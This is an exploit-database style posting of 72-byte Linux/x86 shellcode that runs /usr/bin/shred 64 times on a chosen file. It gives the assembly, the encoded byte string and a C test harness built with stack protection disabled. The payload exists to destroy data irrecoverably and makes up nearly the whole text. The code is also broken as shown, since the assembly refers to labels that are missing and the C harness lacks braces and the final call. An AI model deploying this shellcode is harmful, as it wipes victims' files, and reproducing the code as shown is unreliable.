Linux/x86 - shred file Shellcode (72 bytes) 2019-05-06 21:05:16

# Exploit Title: Linux/x86 shred file (72 bytes)
# Google Dork: None
# Date: 02.05.2019
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 72

This shellcode shred files 64 times

replace test.txt with any file you want.

-----------------------------[Shellcode Dump]---------------------------------
section .text

global _start

xor eax, eax
push eax

push word 0x6465
push 0x7268732f
push 0x6e69622f
push 0x7273752f

mov ebx, esp
jmp short _file

pop ecx
mov ebp, ecx
xor ecx, ecx
push eax
push 0x6e7a762d
mov esi, esp

push eax
push word 0x3436
xor edx, edx
mov edi, esp

push eax
push ebp
push edi
push esi
push ebx
mov ecx, esp
mov al, 0xb

int 0x80

call _params
string db "test.txt"; replace test.txt with any file you want

gcc -m32 -fno-stack-protector -z execstack -o tester tester.c


#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = "\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xeb\x21\x59\x89\xcd\x31\xc9\x50\x68\x2d\x76\x7a\x6e\x89\xe6\x50\x66\x68\x36\x34\x31\xd2\x89\xe7\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xda\xff\xff\xff\x74\x65\x73\x74\x2e\x74\x78\x74";
void main()
printf("Shellcode Length: %d\n", strlen(shellcode));

int (*ret)() = (int(*)())shellcode;